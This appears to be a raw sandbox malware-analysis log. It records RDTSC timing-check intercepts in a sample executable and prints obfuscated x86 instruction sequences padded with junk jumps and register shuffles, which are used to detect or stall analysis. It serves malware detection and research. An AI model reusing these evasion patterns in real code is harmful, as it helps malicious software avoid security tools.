    Source: C:\Users\user\Desktop\FYQ6Ee6gbS.exeRDTSC instruction interceptor: First address: 6F004CD second address: 6F004D4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 mov ah, dh 0x00000006 popad 0x00000007 rdtsc
    Source: C:\Users\user\Desktop\FYQ6Ee6gbS.exeRDTSC instruction interceptor: First address: 6F004D4 second address: 6F004E6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FB418AEFE4Eh 0x00000009 rdtsc
    Source: C:\Users\user\Desktop\FYQ6Ee6gbS.exeRDTSC instruction interceptor: First address: 6F004E6 second address: 6F004FE instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB418E0AE7Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov esi, eax 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
    Source: C:\Users\user\Desktop\FYQ6Ee6gbS.exeRDTSC instruction interceptor: First address: 6F004FE second address: 6F00514 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FB418AEFE51h 0x00000009 popad 0x0000000a rdtsc
    Source: C:\Users\user\Desktop\FYQ6Ee6gbS.exeRDTSC instruction interceptor: First address: 6F00514 second address: 6F0051A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\FYQ6Ee6gbS.exeRDTSC instruction interceptor: First address: 6F0051A second address: 6F0051E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\FYQ6Ee6gbS.exeRDTSC instruction interceptor: First address: 6F0051E second address: 6F0052E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 test esi, esi 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f popad 0x00000010 rdtsc
    Source: C:\Users\user\Desktop\FYQ6Ee6gbS.exeRDTSC instruction interceptor: First address: 6F0052E second address: 6F00534 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\FYQ6Ee6gbS.exeRDTSC instruction interceptor: First address: 6F00534 second address: 6F0057B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB418E0AE83h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 je 00007FB487489FD3h 0x0000000f push eax 0x00000010 push edx 0x00000011 pushad 0x00000012 call 00007FB418E0AE7Bh 0x00000017 pop esi 0x00000018 call 00007FB418E0AE89h 0x0000001d pop ecx 0x0000001e popad 0x0000001f rdtsc
    Source: C:\Users\user\Desktop\FYQ6Ee6gbS.exeRDTSC instruction interceptor: First address: 6F0057B second address: 6F005C7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 movzx eax, di 0x00000006 popad 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, 00000000h 0x0000000e pushad 0x0000000f mov cl, 58h 0x00000011 mov bx, CD1Eh 0x00000015 popad 0x00000016 mov dword ptr [esi], edi 0x00000018 jmp 00007FB418AEFE55h 0x0000001d mov dword ptr [esi+04h], eax 0x00000020 push eax 0x00000021 push edx 0x00000022 push eax 0x00000023 push edx 0x00000024 jmp 00007FB418AEFE58h 0x00000029 rdtsc
    Source: C:\Users\user\Desktop\FYQ6Ee6gbS.exeRDTSC instruction interceptor: First address: 6F005C7 second address: 6F005CB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\FYQ6Ee6gbS.exeRDTSC instruction interceptor: First address: 6F005CB second address: 6F005D1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\FYQ6Ee6gbS.exeRDTSC instruction interceptor: First address: 6F005D1 second address: 6F005D7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\FYQ6Ee6gbS.exeRDTSC instruction interceptor: First address: 6F005D7 second address: 6F0064F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esi+08h], eax 0x0000000b pushad 0x0000000c mov ebx, eax 0x0000000e pushfd 0x0000000f jmp 00007FB418AEFE4Eh 0x00000014 sub cx, ACA8h 0x00000019 jmp 00007FB418AEFE4Bh 0x0000001e popfd 0x0000001f popad 0x00000020 mov dword ptr [esi+0Ch], eax 0x00000023 jmp 00007FB418AEFE56h 0x00000028 mov eax, dword ptr [ebx+4Ch] 0x0000002b pushad 0x0000002c pushad 0x0000002d push edi 0x0000002e pop esi 0x0000002f call 00007FB418AEFE4Fh 0x00000034 pop esi 0x00000035 popad 0x00000036 popad 0x00000037 mov dword ptr [esi+10h], eax 0x0000003a pushad 0x0000003b movsx edi, ax 0x0000003e mov esi, 69AB6CBDh 0x00000043 popad 0x00000044 mov eax, dword ptr [ebx+50h] 0x00000047 push eax 0x00000048 push edx 0x00000049 pushad 0x0000004a mov cx, di 0x0000004d popad 0x0000004e rdtsc
    Source: C:\Users\user\Desktop\FYQ6Ee6gbS.exeRDTSC instruction interceptor: First address: 6F0064F second address: 6F00672 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB418E0AE7Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esi+14h], eax 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007FB418E0AE7Dh 0x00000013 rdtsc
    Source: C:\Users\user\Desktop\FYQ6Ee6gbS.exeRDTSC instruction interceptor: First address: 6F00672 second address: 6F006C3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 call 00007FB418AEFE57h 0x00000008 pop esi 0x00000009 jmp 00007FB418AEFE59h 0x0000000e popad 0x0000000f pop edx 0x00000010 pop eax 0x00000011 mov eax, dword ptr [ebx+54h] 0x00000014 jmp 00007FB418AEFE4Eh 0x00000019 mov dword ptr [esi+18h], eax 0x0000001c push eax 0x0000001d push edx 0x0000001e pushad 0x0000001f push edx 0x00000020 pop eax 0x00000021 popad 0x00000022 rdtsc
    Source: C:\Users\user\Desktop\FYQ6Ee6gbS.exeRDTSC instruction interceptor: First address: 6F006C3 second address: 6F006C9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\FYQ6Ee6gbS.exeRDTSC instruction interceptor: First address: 6F006C9 second address: 6F006CD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\FYQ6Ee6gbS.exeRDTSC instruction interceptor: First address: 6F006CD second address: 6F0078B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov eax, dword ptr [ebx+58h] 0x0000000b pushad 0x0000000c mov dx, FB2Ch 0x00000010 popad 0x00000011 mov dword ptr [esi+1Ch], eax 0x00000014 jmp 00007FB418E0AE87h 0x00000019 mov eax, dword ptr [ebx+5Ch] 0x0000001c pushad 0x0000001d call 00007FB418E0AE84h 0x00000022 pop ebx 0x00000023 call 00007FB418E0AE7Eh 0x00000028 pushfd 0x00000029 jmp 00007FB418E0AE82h 0x0000002e and cx, F208h 0x00000033 jmp 00007FB418E0AE7Bh 0x00000038 popfd 0x00000039 pop ecx 0x0000003a popad 0x0000003b mov dword ptr [esi+20h], eax 0x0000003e jmp 00007FB418E0AE7Fh 0x00000043 mov eax, dword ptr [ebx+60h] 0x00000046 push eax 0x00000047 push edx 0x00000048 pushad 0x00000049 pushfd 0x0000004a jmp 00007FB418E0AE7Bh 0x0000004f sbb si, 92FEh 0x00000054 jmp 00007FB418E0AE89h 0x00000059 popfd 0x0000005a mov dh, ah 0x0000005c popad 0x0000005d rdtsc
    Source: C:\Users\user\Desktop\FYQ6Ee6gbS.exeRDTSC instruction interceptor: First address: 6F0078B second address: 6F007B5 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB418AEFE4Ah 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esi+24h], eax 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007FB418AEFE57h 0x00000013 rdtsc
    Source: C:\Users\user\Desktop\FYQ6Ee6gbS.exeRDTSC instruction interceptor: First address: 6F007B5 second address: 6F007CD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FB418E0AE84h 0x00000009 rdtsc
    Source: C:\Users\user\Desktop\FYQ6Ee6gbS.exeRDTSC instruction interceptor: First address: 6F007CD second address: 6F007D1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\FYQ6Ee6gbS.exeRDTSC instruction interceptor: First address: 6F007D1 second address: 6F007F9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov eax, dword ptr [ebx+64h] 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007FB418E0AE89h 0x00000014 rdtsc
    Source: C:\Users\user\Desktop\FYQ6Ee6gbS.exeRDTSC instruction interceptor: First address: 6F007F9 second address: 6F007FF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\FYQ6Ee6gbS.exeRDTSC instruction interceptor: First address: 6F007FF second address: 6F00818 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB418E0AE7Ch 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esi+28h], eax 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 popad 0x00000012 rdtsc
    Source: C:\Users\user\Desktop\FYQ6Ee6gbS.exeRDTSC instruction interceptor: First address: 6F00818 second address: 6F0081C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\FYQ6Ee6gbS.exeRDTSC instruction interceptor: First address: 6F0081C second address: 6F00822 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\FYQ6Ee6gbS.exeRDTSC instruction interceptor: First address: 6F00822 second address: 6F00827 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
    Source: C:\Users\user\Desktop\FYQ6Ee6gbS.exeRDTSC instruction interceptor: First address: 6F00827 second address: 6F00886 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushfd 0x00000005 jmp 00007FB418E0AE80h 0x0000000a jmp 00007FB418E0AE85h 0x0000000f popfd 0x00000010 popad 0x00000011 pop edx 0x00000012 pop eax 0x00000013 mov eax, dword ptr [ebx+68h] 0x00000016 jmp 00007FB418E0AE7Eh 0x0000001b mov dword ptr [esi+2Ch], eax 0x0000001e jmp 00007FB418E0AE80h 0x00000023 mov ax, word ptr [ebx+6Ch] 0x00000027 push eax 0x00000028 push edx 0x00000029 pushad 0x0000002a movsx edx, cx 0x0000002d mov cl, D7h 0x0000002f popad 0x00000030 rdtsc
    Source: C:\Users\user\Desktop\FYQ6Ee6gbS.exeRDTSC instruction interceptor: First address: 6F00886 second address: 6F0088C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\FYQ6Ee6gbS.exeRDTSC instruction interceptor: First address: 6F0088C second address: 6F00890 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\FYQ6Ee6gbS.exeRDTSC instruction interceptor: First address: 6F00890 second address: 6F00955 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov word ptr [esi+30h], ax 0x0000000c jmp 00007FB418AEFE56h 0x00000011 mov ax, word ptr [ebx+00000088h] 0x00000018 jmp 00007FB418AEFE50h 0x0000001d mov word ptr [esi+32h], ax 0x00000021 jmp 00007FB418AEFE50h 0x00000026 mov eax, dword ptr [ebx+0000008Ch] 0x0000002c pushad 0x0000002d mov dl, 1Bh 0x0000002f popad 0x00000030 mov dword ptr [esi+34h], eax 0x00000033 jmp 00007FB418AEFE54h 0x00000038 mov eax, dword ptr [ebx+18h] 0x0000003b pushad 0x0000003c mov dx, cx 0x0000003f call 00007FB418AEFE4Ah 0x00000044 jmp 00007FB418AEFE52h 0x00000049 pop esi 0x0000004a popad 0x0000004b mov dword ptr [esi+38h], eax 0x0000004e jmp 00007FB418AEFE51h 0x00000053 mov eax, dword ptr [ebx+1Ch] 0x00000056 pushad 0x00000057 mov dx, cx 0x0000005a movzx esi, di 0x0000005d popad 0x0000005e mov dword ptr [esi+3Ch], eax 0x00000061 push eax 0x00000062 push edx 0x00000063 jmp 00007FB418AEFE4Eh 0x00000068 rdtsc
    Source: C:\Users\user\Desktop\FYQ6Ee6gbS.exeRDTSC instruction interceptor: First address: 6F00955 second address: 6F00967 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FB418E0AE7Eh 0x00000009 rdtsc
    Source: C:\Users\user\Desktop\FYQ6Ee6gbS.exeRDTSC instruction interceptor: First address: 6F00967 second address: 6F0096B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\FYQ6Ee6gbS.exeRDTSC instruction interceptor: First address: 6F0096B second address: 6F00A60 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov eax, dword ptr [ebx+20h] 0x0000000b pushad 0x0000000c pushfd 0x0000000d jmp 00007FB418E0AE7Dh 0x00000012 adc ax, 9866h 0x00000017 jmp 00007FB418E0AE81h 0x0000001c popfd 0x0000001d pushad 0x0000001e pushfd 0x0000001f jmp 00007FB418E0AE7Eh 0x00000024 add cl, 00000008h 0x00000027 jmp 00007FB418E0AE7Bh 0x0000002c popfd 0x0000002d pushfd 0x0000002e jmp 00007FB418E0AE88h 0x00000033 sub si, BA68h 0x00000038 jmp 00007FB418E0AE7Bh 0x0000003d popfd 0x0000003e popad 0x0000003f popad 0x00000040 mov dword ptr [esi+40h], eax 0x00000043 pushad 0x00000044 mov esi, 11760B7Bh 0x00000049 pushfd 0x0000004a jmp 00007FB418E0AE80h 0x0000004f sub cx, 8CC8h 0x00000054 jmp 00007FB418E0AE7Bh 0x00000059 popfd 0x0000005a popad 0x0000005b lea eax, dword ptr [ebx+00000080h] 0x00000061 jmp 00007FB418E0AE86h 0x00000066 push 00000001h 0x00000068 pushad 0x00000069 call 00007FB418E0AE7Ah 0x0000006e jmp 00007FB418E0AE82h 0x00000073 pop esi 0x00000074 popad 0x00000075 push esp 0x00000076 pushad 0x00000077 call 00007FB418E0AE7Ch 0x0000007c push eax 0x0000007d push edx 0x0000007e rdtsc
    Source: C:\Users\user\Desktop\FYQ6Ee6gbS.exeRDTSC instruction interceptor: First address: 6F00A60 second address: 6F00AEC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 call 00007FB418AEFE51h 0x0000000a pushfd 0x0000000b jmp 00007FB418AEFE50h 0x00000010 jmp 00007FB418AEFE55h 0x00000015 popfd 0x00000016 pop eax 0x00000017 popad 0x00000018 mov dword ptr [esp], eax 0x0000001b jmp 00007FB418AEFE57h 0x00000020 lea eax, dword ptr [ebp-10h] 0x00000023 jmp 00007FB418AEFE56h 0x00000028 nop 0x00000029 push eax 0x0000002a push edx 0x0000002b jmp 00007FB418AEFE57h 0x00000030 rdtsc
    Source: C:\Users\user\Desktop\FYQ6Ee6gbS.exeRDTSC instruction interceptor: First address: 6F00AEC second address: 6F00AF2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\FYQ6Ee6gbS.exeRDTSC instruction interceptor: First address: 6F00AF2 second address: 6F00B17 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007FB418AEFE58h 0x00000012 rdtsc
    Source: C:\Users\user\Desktop\FYQ6Ee6gbS.exeRDTSC instruction interceptor: First address: 6F00B17 second address: 6F00B26 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB418E0AE7Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
    Source: C:\Users\user\Desktop\FYQ6Ee6gbS.exeRDTSC instruction interceptor: First address: 6F00B26 second address: 6F00B3E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FB418AEFE54h 0x00000009 rdtsc
    Source: C:\Users\user\Desktop\FYQ6Ee6gbS.exeRDTSC instruction interceptor: First address: 6F00B3E second address: 6F00B42 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\FYQ6Ee6gbS.exeRDTSC instruction interceptor: First address: 6F00B42 second address: 6F00B51 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 nop 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
    Source: C:\Users\user\Desktop\FYQ6Ee6gbS.exeRDTSC instruction interceptor: First address: 6F00B51 second address: 6F00B55 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\FYQ6Ee6gbS.exeRDTSC instruction interceptor: First address: 6F00B55 second address: 6F00B5B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\FYQ6Ee6gbS.exeRDTSC instruction interceptor: First address: 6F00BAA second address: 6F00BCA instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB418E0AE81h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 test edi, edi 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e mov ax, dx 0x00000011 push ebx 0x00000012 pop ecx 0x00000013 popad 0x00000014 rdtsc
    Source: C:\Users\user\Desktop\FYQ6Ee6gbS.exeRDTSC instruction interceptor: First address: 6F00BCA second address: 6F00CB2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov esi, 742B0D1Dh 0x00000008 mov dx, si 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e js 00007FB48716E931h 0x00000014 jmp 00007FB418AEFE54h 0x00000019 mov eax, dword ptr [ebp-0Ch] 0x0000001c jmp 00007FB418AEFE50h 0x00000021 mov dword ptr [esi+04h], eax 0x00000024 pushad 0x00000025 call 00007FB418AEFE4Eh 0x0000002a pushfd 0x0000002b jmp 00007FB418AEFE52h 0x00000030 xor cl, 00000038h 0x00000033 jmp 00007FB418AEFE4Bh 0x00000038 popfd 0x00000039 pop eax 0x0000003a mov si, bx 0x0000003d popad 0x0000003e lea eax, dword ptr [ebx+78h] 0x00000041 jmp 00007FB418AEFE4Bh 0x00000046 push 00000001h 0x00000048 jmp 00007FB418AEFE56h 0x0000004d nop 0x0000004e jmp 00007FB418AEFE50h 0x00000053 push eax 0x00000054 jmp 00007FB418AEFE4Bh 0x00000059 nop 0x0000005a pushad 0x0000005b pushfd 0x0000005c jmp 00007FB418AEFE54h 0x00000061 adc si, B858h 0x00000066 jmp 00007FB418AEFE4Bh 0x0000006b popfd 0x0000006c popad 0x0000006d lea eax, dword ptr [ebp-08h] 0x00000070 pushad 0x00000071 push eax 0x00000072 push edx 0x00000073 mov cl, 02h 0x00000075 rdtsc
    Source: C:\Users\user\Desktop\FYQ6Ee6gbS.exe | RDTSC instruction interceptor: First address: 6F00CB2 second address: 6F00D09 instructions: 0x00000000 rdtsc 0x00000002 pushfd 0x00000003 jmp 00007FB418E0AE83h 0x00000008 or ax, BBCEh 0x0000000d jmp 00007FB418E0AE89h 0x00000012 popfd 0x00000013 pop edx 0x00000014 pop eax 0x00000015 mov dx, si 0x00000018 popad 0x00000019 nop 0x0000001a push eax 0x0000001b push edx 0x0000001c jmp 00007FB418E0AE89h 0x00000021 rdtsc
    Source: C:\Users\user\Desktop\FYQ6Ee6gbS.exe | RDTSC instruction interceptor: First address: 6F00E1A second address: 6F00E1E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\FYQ6Ee6gbS.exe | RDTSC instruction interceptor: First address: 6F00E1E second address: 6F00E24 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\FYQ6Ee6gbS.exe | RDTSC instruction interceptor: First address: 6F00E24 second address: 6F00E3E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FB418AEFE56h 0x00000009 rdtsc
    Source: C:\Users\user\Desktop\FYQ6Ee6gbS.exe | RDTSC instruction interceptor: First address: 6F00E3E second address: 6F00E7A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esi+08h], eax 0x0000000b jmp 00007FB418E0AE87h 0x00000010 lea eax, dword ptr [ebx+70h] 0x00000013 push eax 0x00000014 push edx 0x00000015 jmp 00007FB418E0AE85h 0x0000001a rdtsc
    Source: C:\Users\user\Desktop\FYQ6Ee6gbS.exe | RDTSC instruction interceptor: First address: 6F00E7A second address: 6F00EDA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007FB418AEFE57h 0x00000009 jmp 00007FB418AEFE53h 0x0000000e popfd 0x0000000f movzx esi, dx 0x00000012 popad 0x00000013 pop edx 0x00000014 pop eax 0x00000015 push 00000001h 0x00000017 pushad 0x00000018 mov dx, F744h 0x0000001c mov edi, 71FB43B0h 0x00000021 popad 0x00000022 push ecx 0x00000023 jmp 00007FB418AEFE54h 0x00000028 mov dword ptr [esp], eax 0x0000002b push eax 0x0000002c push edx 0x0000002d push eax 0x0000002e push edx 0x0000002f push eax 0x00000030 push edx 0x00000031 rdtsc
    Source: C:\Users\user\Desktop\FYQ6Ee6gbS.exe | RDTSC instruction interceptor: First address: 6F00EDA second address: 6F00EDE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\FYQ6Ee6gbS.exe | RDTSC instruction interceptor: First address: 6F00EDE second address: 6F00EFB instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB418AEFE59h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
    Source: C:\Users\user\Desktop\FYQ6Ee6gbS.exe | RDTSC instruction interceptor: First address: 6F00FB4 second address: 6F01019 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB418E0AE87h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 test edi, edi 0x0000000b jmp 00007FB418E0AE86h 0x00000010 js 00007FB48748953Eh 0x00000016 jmp 00007FB418E0AE80h 0x0000001b mov eax, dword ptr [ebp-14h] 0x0000001e push eax 0x0000001f push edx 0x00000020 jmp 00007FB418E0AE87h 0x00000025 rdtsc
    Source: C:\Users\user\Desktop\FYQ6Ee6gbS.exe | RDTSC instruction interceptor: First address: 6F01019 second address: 6F010BC instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB418AEFE59h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov ecx, esi 0x0000000b jmp 00007FB418AEFE4Eh 0x00000010 mov dword ptr [esi+0Ch], eax 0x00000013 pushad 0x00000014 pushfd 0x00000015 jmp 00007FB418AEFE4Eh 0x0000001a and ecx, 00F842E8h 0x00000020 jmp 00007FB418AEFE4Bh 0x00000025 popfd 0x00000026 mov ah, 9Ah 0x00000028 popad 0x00000029 mov edx, 756006ECh 0x0000002e pushad 0x0000002f mov di, si 0x00000032 popad 0x00000033 sub eax, eax 0x00000035 jmp 00007FB418AEFE4Fh 0x0000003a lock cmpxchg dword ptr [edx], ecx 0x0000003e jmp 00007FB418AEFE56h 0x00000043 pop edi 0x00000044 jmp 00007FB418AEFE50h 0x00000049 test eax, eax 0x0000004b push eax 0x0000004c push edx 0x0000004d push eax 0x0000004e push edx 0x0000004f push eax 0x00000050 push edx 0x00000051 rdtsc
    Source: C:\Users\user\Desktop\FYQ6Ee6gbS.exe | RDTSC instruction interceptor: First address: 6F010BC second address: 6F010C0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\FYQ6Ee6gbS.exe | RDTSC instruction interceptor: First address: 6F010C0 second address: 6F010DD instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB418AEFE59h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
    Source: C:\Users\user\Desktop\FYQ6Ee6gbS.exe | RDTSC instruction interceptor: First address: 6F010DD second address: 6F01153 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov edi, 67ABB802h 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b jne 00007FB48748946Ah 0x00000011 pushad 0x00000012 pushfd 0x00000013 jmp 00007FB418E0AE82h 0x00000018 and si, FF98h 0x0000001d jmp 00007FB418E0AE7Bh 0x00000022 popfd 0x00000023 mov di, cx 0x00000026 popad 0x00000027 mov edx, dword ptr [ebp+08h] 0x0000002a pushad 0x0000002b push ecx 0x0000002c mov dx, 6512h 0x00000030 pop edx 0x00000031 pushfd 0x00000032 jmp 00007FB418E0AE88h 0x00000037 add cx, 0128h 0x0000003c jmp 00007FB418E0AE7Bh 0x00000041 popfd 0x00000042 popad 0x00000043 mov eax, dword ptr [esi] 0x00000045 pushad 0x00000046 push eax 0x00000047 push edx 0x00000048 mov ebx, ecx 0x0000004a rdtsc
    Source: C:\Users\user\Desktop\FYQ6Ee6gbS.exe | RDTSC instruction interceptor: First address: 6F01153 second address: 6F011C0 instructions: 0x00000000 rdtsc 0x00000002 mov bx, ax 0x00000005 pop edx 0x00000006 pop eax 0x00000007 mov ch, 0Dh 0x00000009 popad 0x0000000a mov dword ptr [edx], eax 0x0000000c jmp 00007FB418AEFE55h 0x00000011 mov eax, dword ptr [esi+04h] 0x00000014 push eax 0x00000015 push edx 0x00000016 pushad 0x00000017 pushfd 0x00000018 jmp 00007FB418AEFE53h 0x0000001d add eax, 6795607Eh 0x00000023 jmp 00007FB418AEFE59h 0x00000028 popfd 0x00000029 call 00007FB418AEFE50h 0x0000002e pop eax 0x0000002f popad 0x00000030 rdtsc
    Source: C:\Users\user\Desktop\FYQ6Ee6gbS.exe | RDTSC instruction interceptor: First address: 6F011C0 second address: 6F011C6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\FYQ6Ee6gbS.exe | RDTSC instruction interceptor: First address: 6F011C6 second address: 6F011CA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
